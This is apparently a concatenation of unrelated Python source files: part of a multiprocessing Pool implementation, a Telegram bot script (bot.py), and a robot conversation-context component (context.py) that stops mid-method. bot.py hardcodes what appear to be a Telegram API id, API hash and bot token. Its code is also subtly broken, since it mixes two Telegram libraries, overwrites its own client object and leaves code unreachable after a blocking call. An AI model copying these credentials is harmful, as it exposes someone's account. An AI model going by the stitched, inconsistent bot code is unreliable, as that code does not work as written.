self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool,
self._cache)
if threads:
self._task_handler.start()
self.check_timeouts = None
# Thread killing timedout jobs.
if self.enable_timeouts:
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
else:
self._timeout_handler = None
self._timeout_handler_started = False
self._timeout_handler_mutex = None
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worker %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads and self._timeout_handler is not None:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
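# For example (illustrative, assuming a started pool): pool.apply(divmod, (7, 3)) -> (2, 1)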
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
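# For example (illustrative, assuming a started pool):
#     pool.starmap(pow, [(2, 5), (3, 2)])  ->  [32, 9]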
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
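# For example (illustrative, assuming a started pool and a picklable ``square``):
#     for value in pool.imap(square, range(3)):
#         print(value)        # prints 0, 1, 4, in order and lazily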
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the function's return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
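# A hedged usage sketch (``on_done``/``on_err`` are illustrative names, not
# part of this module; ``square`` is assumed to be a picklable module-level
# function):
#
#     def on_done(value):       # receives the return value on success
#         print('result:', value)
#
#     def on_err(exc_info):     # receives an ExceptionInfo on failure
#         print('failed:', exc_info)
#
#     pool.apply_async(square, (3,), callback=on_done,
#                      error_callback=on_err).get()   # -> 9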
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
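# For example (illustrative), given some function ``f``:
#     list(Pool._get_tasks(f, range(5), 2)) -> [(f, (0, 1)), (f, (2, 3)), (f, (4,))]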
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<{name}: {id} ack:{ack} ready:{ready}>'.format(
name=self.__class__.__name__,
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.is_set()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._callbacks_propagate:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from .dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
bot.py
|
import sys, io
import traceback
from amanobot.loop import MessageLoop
from contextlib import redirect_stdout
from colorama import Fore
import config
import time
import threading
from amanobot.exception import TooManyRequestsError, NotEnoughRightsError
from urllib3.exceptions import ReadTimeoutError
import db_handler as db
from telegram_upload.exceptions import catch
from telegram_upload.management import manage
import asyncio
import difflib
import html
import logging
import os
import re
import urllib.parse
import click
import subprocess
from datetime import datetime
from telethon.tl.types import DocumentAttributeVideo
from telethon.errors import MessageNotModifiedError
from telethon import TelegramClient, events, types, custom, utils
from telethon.extensions import markdown
bot = TelegramClient("telegram-upload", "256406", "31fd969547209e7c7e23ef97b7a53c37")
logging.basicConfig(level=logging.WARNING)
logging.getLogger('asyncio').setLevel(logging.ERROR)
bot = config.bot
ep = []
n_ep = []
for num, i in enumerate(config.enabled_plugins):
try:
print(Fore.RESET + 'Loading plugins... [{}/{}]'.format(num+1, len(config.enabled_plugins)), end='\r')
exec('from plugins.{0} import {0}'.format(i))
ep.append(i)
except Exception as erro:
n_ep.append(i)
print('\n'+Fore.RED+'Error loading the plugin {}:{}'.format(i, Fore.RESET), erro)
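# Illustrative plugin shape (an assumption based on the loader above and the
# handle() dispatcher below, not a plugin shipped with this bot): each enabled
# plugin ``foo`` lives in plugins/foo.py and exposes a callable ``foo(msg)``
# that returns a truthy value once the message has been handled, e.g.:
#
#     # plugins/ping.py
#     def ping(msg):
#         if msg.get('text') == '/ping':
#             return True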
def handle_thread(*args):
t = threading.Thread(target=handle, args=args)
t.start()
def handle(msg):
try:
for plugin in ep:
p = globals()[plugin](msg)
if p:
break
except (TooManyRequestsError, NotEnoughRightsError, ReadTimeoutError):
pass
except Exception as e:
with io.StringIO() as buf, redirect_stdout(buf):
traceback.print_exc(file=sys.stdout)
res = buf.getvalue()
bot.sendMessage(config.logs, '''There was an error in the plugin {}:
{}'''.format(plugin, res))
print('\n\nBot started! {}\n'.format(config.version))
MessageLoop(bot, handle_thread).run_as_thread()
bot.start(bot_token="671045549:AAH72sek9a9jPWHbBp8vRrWL_u68J9pRXYU")
bot.run_until_disconnected()
wr = db.get_restarted()
if wr:
try:
bot.editMessageText(wr, 'Restarted successfully')
except Exception:
pass
db.del_restarted()
else:
bot.sendMessage(config.logs, '''Bot Details
Version: {}
Plugins Loaded: {}
An error occurred in {} plugin(s){}'''.format(config.version, len(ep), len(n_ep), ': '+(', '.join(n_ep)) if n_ep else ''))
while True:
time.sleep(10)
|
context.py
|
from . import SpeechRecognitionComponent, ObjectDetectionComponent, FaceRecognitionComponent, TextToSpeechComponent
from ..sensor import Context, UtteranceHypothesis
from ..abstract import AbstractComponent, Led
from pepper.language import Utterance
from pepper import config
from collections import deque
from threading import Thread, Lock
from time import time
from typing import Deque
import numpy as np
class ContextComponent(AbstractComponent):
# Minimum bounding-box area (fraction of the frame) for a person to enter/exit a conversation
PERSON_AREA_ENTER = 0.25
PERSON_AREA_EXIT = 0.2
# Minimum area ratio between the closest and next-closest person to enter/exit a one-on-one conversation
PERSON_DIFF_ENTER = 1.5
PERSON_DIFF_EXIT = 1.4
CONVERSATION_TIMEOUT = 5
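# Worked reading of the constants above (numbers taken directly from them):
# a person enters a conversation once their bounding box covers at least 0.25
# of the frame and only leaves once it drops below 0.2; likewise the closest
# person must appear 1.5x larger than the next-closest to start a one-on-one
# chat, but only needs to stay 1.4x larger to keep it. The lower exit
# thresholds add hysteresis so conversations do not flap, and a chat times out
# after 5 seconds without a qualifying person in view.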
PEOPLE_LEDS = [Led.LeftFaceLed1, Led.RightFaceLed1,
Led.LeftFaceLed2, Led.RightFaceLed2,
Led.LeftFaceLed3, Led.RightFaceLed3,
Led.LeftFaceLed4, Led.RightFaceLed4,
Led.LeftFaceLed5, Led.RightFaceLed5,
Led.LeftFaceLed6, Led.RightFaceLed6,
Led.LeftFaceLed7, Led.RightFaceLed7,
Led.LeftFaceLed8, Led.RightFaceLed8]
def __init__(self, backend):
super(ContextComponent, self).__init__(backend)
speech_comp = self.require(ContextComponent, SpeechRecognitionComponent) # type: SpeechRecognitionComponent
object_comp = self.require(ContextComponent, ObjectDetectionComponent) # type: ObjectDetectionComponent
face_comp = self.require(ContextComponent, FaceRecognitionComponent) # type: FaceRecognitionComponent
self.require(ContextComponent, TextToSpeechComponent) # type: TextToSpeechComponent
self._conversation_time = time()
context_lock = Lock()
self._context = Context()
self._face_vectors = deque(maxlen=50)
self._people_info = []
self._face_info = []
def on_transcript(hypotheses, audio):
"""
Add Transcript to Chat (if a current Chat exists)
Parameters
----------
hypotheses: List[UtteranceHypothesis]
audio: np.ndarray
"""
with context_lock:
if self.context.chatting and hypotheses:
# Add ASR Transcript to Chat as Utterance
utterance = self.context.chat.add_utterance(hypotheses, False)
# Call On Chat Turn Event
self.on_chat_turn(utterance)
def get_closest_people(people):
person_area_threshold = (self.PERSON_AREA_EXIT if self.context.chatting else self.PERSON_AREA_ENTER)
person_diff_threshold = (self.PERSON_DIFF_EXIT if self.context.chatting else self.PERSON_DIFF_ENTER)
people_in_range = [person for person in people if person.bounds.area >= person_area_threshold]
# If only one person is in range
if len(people_in_range) == 1:
# Return that person
return [people_in_range[0]]
# If multiple people are in range
elif len(people_in_range) >= 2:
# Sort them by proximity
people_sorted = np.argsort([person.bounds.area for person in people_in_range])[::-1]
# Identify the two closest individuals
closest = people_in_range[people_sorted[0]]
next_closest = people_in_range[people_sorted[1]]
# If the closest individual is significantly closer than the next one
if closest.bounds.area >= person_diff_threshold * next_closest.bounds.area:
# Return Closest Individual
return [closest]
# If nobody is clearly closest
else:
# Return all People
return people_in_range
else:
return []
def get_face(person, faces):
for face in faces:
if face.bounds.is_subset_of(person.bounds):
return face
def on_image(image, orientation):
# Get People within Conversation Bounds
closest_people = get_closest_people(self._people_info)
# if closest_people:
# self.backend.led.set(self.PEOPLE_LEDS[:len(closest_people)*2], (0, 1, 0), 0)
# else:
# self.backend.led.set([Led.RightFaceLeds, Led.LeftFaceLeds], (0, 0, 0), 0)
if not self.context.chatting:
# If one person is closest and his/her face is identifiable -> Start Personal Conversation
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# If multiple people are in range, with nobody seemingly closest -> Start Group Conversation
elif len(closest_people) >= 2:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(config.HUMAN_CROWD,)).start()
self._face_vectors.clear()
elif self.context.chatting:
# When talking to a human crowd
if self.context.chat.speaker == config.HUMAN_CROWD:
# If still in conversation with Group, update conversation time
if len(closest_people) >= 2:
self._conversation_time = time()
# Else, when conversation times out
elif time() - self._conversation_time >= self.CONVERSATION_TIMEOUT:
# If a single Person enters conversation at this point -> Start conversation with them
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# Otherwise, Exit Chat
else:
self.on_chat_exit()
self._face_vectors.clear()
else: # When talking to a Specific Person
# If still in conversation with Person, update conversation time
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
# If Still Chatting with Same Person -> Update Conversation Time & Face Vectors
if closest_face.name == self.context.chat.speaker:
self._conversation_time = time()
self._face_vectors.append(closest_face.representation)
# If Chatting to Unknown Person and Known Person Appears -> Switch Chat
elif self.context.chat.speaker == config.HUMAN_UNKNOWN and closest_face.name != config.HUMAN_UNKNOWN:
self._conversation_time = time()
